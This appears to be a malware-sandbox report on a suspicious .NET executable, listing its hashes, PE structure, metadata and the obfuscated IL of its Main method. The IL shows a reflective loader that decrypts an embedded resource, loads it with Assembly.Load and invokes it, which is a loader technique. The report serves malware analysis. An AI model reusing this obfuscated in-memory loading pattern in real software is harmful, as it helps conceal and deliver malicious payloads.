Suspicious
Suspect

239dc7604cb37bd8d05228a3296312d1

PE Executable
|
MD5: 239dc7604cb37bd8d05228a3296312d1
|
Size: 1.02 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Medium

Hash
 Hash Value
MD5
239dc7604cb37bd8d05228a3296312d1
Sha1
b45d02cf991d76968128724ed87112dc86cd2974
Sha256
7b50accfe80d370e374def391c5d57fbf8c7a468d1f20e1274e59839dafbf2db
Sha384
2178afb6ffacd9193d569c80edc130f005bb9d991ce03ef82c40c06f273cf4ae30459019a01c3d74f1c607bf5bf80077
Sha512
b94cfb6947242d2441c480c322eea1cee7c43b903b9e28a3112a35e17ccdd3a54239233067adfa816ef88c47f9c4512a8222f95eb70802c8ed48d1171e969f53
SSDeep
24576:uqRyP/DWeZ+fubP6xLN/l34KvpoJDKBKEFZ1aC+i/f:ZkDdZ+vxLF55vpZ5Px+M
TLSH
7825230817EC0799EA5E6D7FB9B62300D782F0B06907DBDFBC94AAF085C57E49602593

PeID

Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
File Structure
239dc7604cb37bd8d05228a3296312d1
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ZKvq
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Pgdbejvhrbl.exe
Full Name

Pgdbejvhrbl.exe
EntryPoint

System.Void Ojyvjdz.Vuefaq::Main()
Scope Name

Pgdbejvhrbl.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Pgdbejvhrbl
Assembly Version

1.0.6778.10827
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.6
Total Strings

15
Main Method

System.Void Ojyvjdz.Vuefaq::Main()
Main IL Instruction Count

189
Main IL

nop <null> ldnull <null> stloc.0 <null> br.s IL_0015: ldc.i4.1 nop <null> nop <null> call System.Byte[] Ojyvjdz.Properties.Swvvdi::get_e() stloc.0 <null> leave.s IL_001A: ldloc.0 pop <null> nop <null> nop <null> leave.s IL_0014: nop nop <null> ldc.i4.1 <null> stloc.1 <null> ldloc.1 <null> brtrue.s IL_0005: nop ldloc.0 <null> ldnull <null> cgt.un <null> stloc.2 <null> ldloc.2 <null> brfalse.s IL_0025: ldc.i4.1 ldc.i4.0 <null> br.s IL_0028: brtrue IL_01D8 ldc.i4.1 <null> br.s IL_0028: brtrue IL_01D8 brtrue IL_01D8: ret nop <null> br.s IL_0080: ldc.i4.s 95 ldloc.s V_12 ldc.i4.s 99 xor <null> stloc.s V_12 br.s IL_0056: ldc.i4.s 99 ldloc.s V_13 ldc.i4.s 96 xor <null> stloc.s V_13 ldloc.s V_13 ldc.i4.s 101 sub <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 99 call System.Int32 System.Runtime.CompilerServices.NullableAttribute::a(System.Int32) stloc.s V_13 br.s IL_0039: ldloc.s V_13 ldloc.s V_12 ldc.i4.s 93 add <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.6 <null> stloc.s V_13 br.s IL_0039: ldloc.s V_13 ldc.i4.s 95 call System.Int32 j::ad(System.Int32) stloc.s V_12 ldc.i4.7 <null> stloc.s V_13 br.s IL_0039: ldloc.s V_13 br.s IL_0030: ldloc.s V_12 ldloc.3 <null> ldlen <null> ldc.i4.0 <null> cgt.un <null> stloc.s V_4 ldc.i4.s -57 stloc.s V_12 br.s IL_0030: ldloc.s V_12 ldloc.s V_4 brfalse.s IL_00BF: ldc.i4.1 ldc.i4.s -59 stloc.s V_12 br.s IL_0030: ldloc.s V_12 ldloc.0 <null> call System.Byte[] Ojyvjdz.Vuefaq::a(System.Byte[]) stloc.3 <null> ldc.i4.s 98 call System.Int32 System.Runtime.CompilerServices.NullableAttribute::a(System.Int32) stloc.s V_12 br IL_0030: ldloc.s V_12 ldc.i4.0 <null> br.s IL_00C2: brtrue IL_01D7 ldc.i4.1 <null> br.s IL_00C2: brtrue IL_01D7 brtrue IL_01D7: nop nop <null> br.s IL_00EB: ldc.i4.s 96 ldloc.s V_11 ldc.i4.s 93 xor <null> stloc.s V_11 ldloc.s V_11 ldc.i4.s 95 sub <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 96 call System.Int32 j::ad(System.Int32) stloc.s V_11 br.s IL_00CA: ldloc.s V_11 ldloc.3 <null> call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) stloc.s V_5 ldc.i4.s 61 stloc.s V_11 br.s IL_00CA: ldloc.s V_11 ldloc.s V_5 callvirt System.String System.Reflection.Assembly::get_CodeBase() call System.Boolean System.String::IsNullOrWhiteSpace(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_6 ldc.i4.s 60 stloc.s V_11 br.s IL_00CA: ldloc.s V_11 ldloc.s V_6 brfalse.s IL_012D: ldc.i4.1 ldc.i4.s 101 call System.Int32 j::ad(System.Int32) stloc.s V_11 br.s IL_00CA: ldloc.s V_11 ldc.i4.0 <null> br.s IL_0130: brtrue IL_01D6 ldc.i4.1 <null> br.s IL_0130: brtrue IL_01D6 brtrue IL_01D6: nop nop <null> br.s IL_015D: ldc.i4.s 93 ldloc.s V_10 ldc.i4.s 83 xor <null> stloc.s V_10 ldloc.s V_10 ldc.i4.s 85 add <null> switch dnlib.DotNet.Emit.Instruction[] ldc.i4.s 93 call System.Int32 j::ad(System.Int32) stloc.s V_10 br.s IL_0138: ldloc.s V_10 ldloc.s V_5 ldloc.s V_7 callvirt System.Type System.Reflection.Assembly::GetType(System.String) stloc.s V_8 ldc.i4.s 85 call System.Int32 j::ad(System.Int32) stloc.s V_10 br.s IL_0138: ldloc.s V_10 ldloc.s V_8 callvirt System.String System.Type::get_FullName() call System.Boolean System.String::IsNullOrEmpty(System.String) ldc.i4.0 <null> ceq <null> stloc.s V_9 ldc.i4.s -3 stloc.s V_10 br.s IL_0138: ldloc.s V_10 ldc.i4 16814 call System.String c::a(System.Int32) stloc.s V_7 ldc.i4.s -8 stloc.s V_10 br.s IL_0138: ldloc.s V_10 ldloc.s V_9 brfalse.s IL_01B4: ldc.i4.1 ldc.i4.s -4 stloc.s V_10 br.s IL_0138: ldloc.s V_10 ldc.i4.0 <null> br.s IL_01B7: brtrue.s IL_01D5 ldc.i4.1 <null> br.s IL_01B7: brtrue.s IL_01D5 brtrue.s IL_01D5: nop nop <null> ldloc.s V_8 ldc.i4 16757 call System.String c::a(System.Int32) ldc.i4 256 ldnull <null> ldnull <null> ldnull <null> callvirt System.Object System.Type::InvokeMember(System.String,System.Reflection.BindingFlags,System.Reflection.Binder,System.Object,System.Object[]) pop <null> nop <null> nop <null> nop <null> nop <null> ret <null>
239dc7604cb37bd8d05228a3296312d1 (1.02 MB)
File Structure
239dc7604cb37bd8d05228a3296312d1
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ZKvq
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙